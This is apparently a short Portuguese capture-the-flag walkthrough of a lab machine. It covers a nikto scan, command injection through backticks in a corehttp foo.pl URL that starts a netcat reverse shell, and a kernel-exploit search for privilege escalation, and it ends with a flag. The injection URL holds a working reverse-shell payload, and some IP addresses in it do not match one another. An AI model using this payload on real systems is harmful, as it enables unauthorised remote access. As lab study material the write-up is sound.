faz um nmap e acha uma porta 10443

rodando um nikto nessa porta acho o /dev
root@0xffff:~# nikto -h 192.168.91.132 -p 10443
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.91.132
+ Target Hostname:    192.168.91.132
+ Target Port:        10443
+ Start Time:         2018-01-30 17:17:08 (GMT-2)
---------------------------------------------------------------------------
+ Server: corehttp-0.5.3.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ 7538 requests: 1 error(s) and 5 item(s) reported on remote host
+ End Time:           2018-01-30 17:17:30 (GMT-2) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


acessando o /dev encontrei um arquivo foo.pl que a principio roda estatistica

porque nao fazer ele rodar o meu comando, porem como ?

procurando no exploitdb vi que o corehttp tem uma vulnerabilidade que da pra rodar comando no fool.pl entre ` `
https://www.exploit-db.com/exploits/10610/



http://192.168.10.150:10443/dev/foo.pl?`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.200.2 8080 >/tmp/f&`

obtemos o shell

root@0xffff:~# nc -lvp 8080
listening on [any] 8080 ...
192.168.91.132: inverse host lookup failed: Unknown host
connect to [192.168.91.130] from (UNKNOWN) [192.168.91.132] 44864
/bin/sh: can't access tty; job control turned off
$ id
uid=1000(operador) gid=1000(operador) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(operador)
$ 


escalando privilegio
root@0xffff:~# searchsploit linux local ubuntu
-------------------------------------------------------- ----------------------------------
 Exploit Title                                          |  Path
                                                        | (/usr/share/exploitdb/)
-------------------------------------------------------- ----------------------------------
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CA | exploits/linux/local/14814.c




FLAG: 797f81bf90eaf2b9dd905c56e947236b

